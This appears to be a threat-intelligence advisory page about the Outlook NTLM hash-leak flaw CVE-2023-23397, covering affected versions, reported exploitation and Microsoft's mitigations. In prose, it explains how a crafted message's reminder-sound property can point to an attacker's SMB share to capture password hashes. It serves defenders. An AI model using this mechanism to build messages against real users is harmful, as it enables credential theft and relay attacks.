Microsoft Outlook is affected by CVE-2023-23397, an elevation-of-privilege vulnerability that allows attackers the capability to launch a NTLM Relay attack against another service to authenticate. Although limited attacks were observed, the vulnerability has a low attack complexity rating, meaning that threat actors are likely to utilize it with relative ease - disclosed to have been exploited in attacks since April of 2022. The exploit is triggered when the Outlook client retrieves and processes a malicious message, calendar invite, or task. Cybercriminals thus far have been linked to Russian intelligence services actively exploiting this vulnerability in targeted attacks against government, military, energy, and transportation organizations. It is also worth noting that the vulnerability also has been proven exploitable only in Windows-based versions of Outlook, and not other versions such as macOS. Due to the usage of Outlook in Microsoft Windows systems and the ubiquity of Microsoft Office globally, as well as the ongoing comprehension and understanding of the vulnerability's exploitation, it is important that organizations prepare themselves and stay on top of any updates concerning CVE-2023-23397.
Microsoft published a detailed advisory for CVE-2023-23397, a zero-day vulnerability that allows a threat actor to send a specially crafted email to Microsoft Outlook clients on Windows that automatically connects to a UNC location under the actor's control to receive the Net-NTLMv2 user's password hash. All Microsoft Outlook products on Windows are affected, but not Outlook for Android, iOS, or macOS. Microsoft recommends that users patch their systems immediately and has released several mitigations for organizations that cannot patch their systems immediately - even providing a script to check for signs of exploitation (It can be found here).
The vulnerability is a critical escalation of privilege vulnerability via NTLM credential theft. Attackers can create a specially crafted email message containing the extended MAPI property "PidLidReminderFileParameter" that specifies the filename of the sound that a client should play when the reminder for that object becomes overdue. Inside the PidLidReminderFileParameter property, the attacker specifies a Universal Naming Convention (UNC) path to an SMB share controlled by the attacker. This leads a vulnerable system to send the user's Net-NTLMv2 hash to the attacker, which can then be used in NTLM Relay attacks against other systems. Exploitation can occur prior to the email being opened or previewed by the user.
GET THE FREE HUNT PACKAGES!
CHECK OUT OTHER EMERGING THREATS >
mommy Access Broker is enabling access-as-a-service operations through detailed intrusion guides and compromised credentials, and Intel 471 has released reporting and Hunt Packages to support threat hunting and detection.
NATO's annual summit comes as member countries face a rapidly changing global security dynamic, with cyber playing a significant role.
DragonForce is a Ransomware-as-a-Service group targeting global industries with customizable payloads, enabling widespread attacks and persistent extortion through an affiliate-driven model.
Stay informed with our weekly executive update, sending you the latest news and timely data on the threats, risks, and regulations affecting your organization.